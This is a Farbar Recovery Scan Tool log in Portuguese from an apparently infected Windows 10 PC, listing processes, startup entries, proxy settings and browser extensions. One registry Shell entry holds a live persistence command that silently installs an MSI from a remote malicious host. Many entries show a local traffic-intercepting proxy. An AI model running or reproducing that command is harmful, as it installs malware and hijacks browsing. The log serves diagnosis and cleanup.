Resultado do exame da Farbar Recovery Scan Tool (FRST) (x86) VersÃ£o: 26-10-2017
Executado por Filipe (administrador) em FILIPE-PC (30-10-2017 11:59:41)
Executando a partir de C:\Users\Filipe\Desktop
Perfis Carregados: Filipe (Perfis DisponÃ­veis: Filipe & DefaultAppPool)
Platform: Microsoft Windows 10 Pro VersÃ£o 1703 15063.674 (X86) Idioma: PortuguÃªs (Brasil)
Internet Explorer VersÃ£o 11 (Navegador padrÃ£o: Edge)
Modo da InicializaÃ§Ã£o: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluÃ­da na fixlist, o processo serÃ¡ fechado. O arquivo nÃ£o serÃ¡ movido.)

(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exe
() C:\Program Files\Intel\Intel(R) ME FW Recovery Agent\bin\updateui.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\backgroundTaskHost.exe

==================== Registro (Whitelisted) ===========================

(Se uma entrada for incluÃ­da na fixlist, o Ã­tem no Registro serÃ¡ restaurado para o padrÃ£o ou removido. O arquivo nÃ£o serÃ¡ movido.)

HKLM\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated)
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\...\Run: [BitTorrent] => C:\Users\Filipe\AppData\Roaming\BitTorrent\BitTorrent.exe [2150088 2017-09-19] (BitTorrent Inc.)
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7347928 2017-02-08] (Piriform Ltd)
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1WRkQQN8E1OWzYRkEyMjhYNTRLRWw1FTRLNTk1OTUyRH== /q <==== ATENÃÃO
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [793088 2017-03-18] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OSD.lnk [2015-12-10]
ShortcutTarget: OSD.lnk -> C:\Windows\Installer\{5A9C96FE-1376-45E1-8556-C81255F0B5A7}\_AD2F6128FA18C1F8978B88.exe ()
Startup: C:\Users\Filipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitorar alertas de tinta - .lnk [2017-04-27]
ShortcutTarget: Monitorar alertas de tinta - .lnk -> C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\Users\Filipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_uninst_09452932.lnk [2017-05-04]
Startup: C:\Users\Filipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_uninst_65902682.lnk [2016-07-13]
GroupPolicy: RestriÃ§Ã£o ? <==== ATENÃÃO
CHR HKLM\SOFTWARE\Policies\Google: RestriÃ§Ã£o <==== ATENÃÃO

==================== Internet (Whitelisted) ====================

(Se um Ã­tem for incluÃ­do na fixlist, sendo um Ã­tem do Registro, serÃ¡ removido ou restaurado para o padrÃ£o.)

ProxyEnable: [HKLM] => Proxy estÃ¡ habilitado.
ProxyServer: [HKLM] => 127.0.0.1:15279
ProxyServer: [S-1-5-21-1966662122-1671974175-2396957999-1000] => 127.0.0.1:15279
AutoConfigURL: [S-1-5-21-1966662122-1671974175-2396957999-1000] => 127.0.0.1:15279
Hosts: HÃ¡ mais de uma entrada no Hosts. Veja a seÃ§Ã£o Hosts do Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{1b7582e1-6d64-4be3-8ff9-caaf6957a949}: [DhcpNameServer] 192.168.1.254 200.222.0.35 200.222.0.34
Tcpip\..\Interfaces\{a6791a0f-6df6-42b5-bb0a-86093150fe30}: [DhcpNameServer] 192.168.0.1
ManualProxies: 1127.0.0.1:42786

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131503094810559042&GUID=134F8E3C-6527-4197-8608-3F08F80BAF5E
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#web/result?source=art&q=
HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.search.yahoo.com/?fr=avantsearch6
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1966662122-1671974175-2396957999-1000 -> DefaultScope {4E8CB1EA-BA25-453A-9532-CF99439213B2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1966662122-1671974175-2396957999-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.google.com/search?hl=en&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1966662122-1671974175-2396957999-1000 -> {4E8CB1EA-BA25-453A-9532-CF99439213B2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
BHO: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll [2016-06-14] (Wondershare)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  Nenhum Arquivo

FireFox:
========
FF DefaultProfile: qucwuyoj.firefox
FF DefaultProfile: wso79ajb.default
FF ProfilePath: C:\Users\Filipe\AppData\Roaming\Profiles\wso79ajb.default [nÃ£o encontrado (a)] <==== ATENÃÃO
FF DefaultProfile: 8zmeg0gx.default
FF ProfilePath: C:\Users\Filipe\AppData\Roaming\Mozilla\Firefox\Profiles\qucwuyoj.firefox [2017-10-29]
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http", "127.0.0.1"
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 57103
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> no_proxies_on", ""
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl", "127.0.0.1"
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 57103
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> type", 1
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox ->  type", 1
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 53288
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 53288
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 37521
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 37521
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 25990
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 25990
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 4141
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 4141
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 40241
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 40241
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 18941
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 18941
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 10478
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 10478
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 56152
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 56152
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 61726
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 61726
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 19512
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 19512
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 4388
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 4388
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 10711
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 10711
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 49393
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 49393
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 57356
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 57356
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 41370
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 41370
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 29720
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 29720
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 19609
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 19609
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 48140
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 48140
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 52387
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 52387
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 54771
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 54771
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 22999
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 22999
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 16126
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 16126
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 31877
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 31877
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 4618
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 4618
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 44993
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 44993
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 19157
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 19157
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 41127
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 41127
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 8239
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 8239
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 60681
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 60681
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 57707
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 57707
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 40185
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 40185
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 20004
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 20004
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 24079
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 24079
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 10965
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 10965
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 45733
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 45733
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 61008
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 61008
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 16262
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 16262
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 41385
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 41385
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 4608
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 4608
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 28926
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 28926
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 13816
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 13816
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 41958
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 41958
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 49985
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 49985
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 36533
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 36533
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 2851
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 2851
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 50998
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 50998
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 20478
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 20478
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 14451
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 14451
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 56053
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 56053
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 26192
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 26192
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 10018
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 10018
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 10915
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 10915
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 46216
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 46216
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 54339
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 54339
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 3136
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 3136
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 25657
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 25657
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 4495
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 4495
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 15676
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 15676
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 42786
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 42786
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> http_port", 15279
FF NetworkProxy: Mozilla\Firefox\Profiles\qucwuyoj.firefox -> ssl_port", 15279
FF Extension: (Sem Nome) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [nÃ£o encontrado (a)]
FF ProfilePath: C:\Users\Filipe\AppData\Roaming\Firefox\Firefox\Profiles\hkzamnay.default [2017-05-24] <==== ATENÃÃO
FF user.js: detected! => C:\Users\Filipe\AppData\Roaming\Firefox\Firefox\Profiles\hkzamnay.default\user.js [2017-05-23]
FF Extension: (Video DownloadHelper) - C:\Users\Filipe\AppData\Roaming\Firefox\Firefox\Profiles\hkzamnay.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-05-25]
FF Extension: (iSkysoft iMedia Converter Deluxe) - C:\ProgramData\iSkysoft\Video Converter Ultimate\ISVCU@iSkysoft.com_xpi\ []
FF ProfilePath: C:\Users\Filipe\AppData\Roaming\Avant Profiles\.default\gecko\Mozilla\Avant\Profiles\8zmeg0gx.default [2017-09-28]
FF NetworkProxy: Avant Profiles\.default\gecko\Mozilla\Avant\Profiles\8zmeg0gx.default -> type", 0
FF HKLM\...\Firefox\Extensions: [ISVCU@iSkysoft.com] - C:\ProgramData\iSkysoft\Video Converter Ultimate\ISVCU@iSkysoft.com_xpi
FF Extension: (iSkysoft iMedia Converter Deluxe) - C:\ProgramData\iSkysoft\Video Converter Ultimate\ISVCU@iSkysoft.com_xpi [2016-07-15]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-10] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\WINDOWS\system32\Adobe\Director\np32dsw_1229199.dll [2017-03-31] (Adobe Systems, Inc.)
FF Plugin: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin: @Nero.com/KM -> C:\PROGRA~1\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [2014-08-29] (Nero AG)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-09-26] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-09-26] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-07-31] (Adobe Systems Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR NewTab: ChromeDefaultData ->  Not-active:"chrome-extension://apmaajgpadfdkidkopanldnlkbclieko/newtab/newtab.html"
CHR Profile: C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-10-30] <==== ATENÃÃO
CHR Extension: (Flash Video Downloader) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2017-10-27]
CHR Extension: (Google Drive) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-20]
CHR Extension: (Screen Addict) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apmaajgpadfdkidkopanldnlkbclieko [2017-01-19]
CHR Extension: (YouTube) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-20]
CHR Extension: (Adblock Plus) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-09-26]
CHR Extension: (Tampermonkey) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-09-04]
CHR Extension: (Video Downloader professional) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2017-10-18]
CHR Extension: (FBDown Video Downloader) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2017-10-18]
CHR Extension: (Windows Media Player Extension for HTML5) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\hokdglbhghcebcopdbanieangmcamaak [2017-09-18] [UpdateUrl: hxxp://www.interoperabilitybridges.com/ChromeWMP/wmpChromeupdates.xml] <==== ATENÃÃO
CHR Extension: (IDM Integration Module) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\jeaohhlajejodfjadcponpnjgkiikocn [2017-09-28]
CHR Extension: (Video DownloadHelper) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-22]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (PDF Viewer) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oemmndcbldboiebfnladdacbdfmadadm [2017-07-18]
CHR Extension: (Gmail) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-06-20]
CHR Extension: (Chrome Media Router) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-24]
CHR Profile: C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default [2017-10-28]
CHR Extension: (Google Docs) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-29]
CHR Extension: (MyWebFace) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\dcmcdoaknaojppeomaejlbjbpgocdhok [2016-04-14]
CHR Extension: (Tampermonkey) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2016-05-30]
CHR Extension: (Video DownloadHelper) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2015-12-29]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-05]
CHR Extension: (Gmail) - C:\Users\Filipe\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-29]
CHR HKLM\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
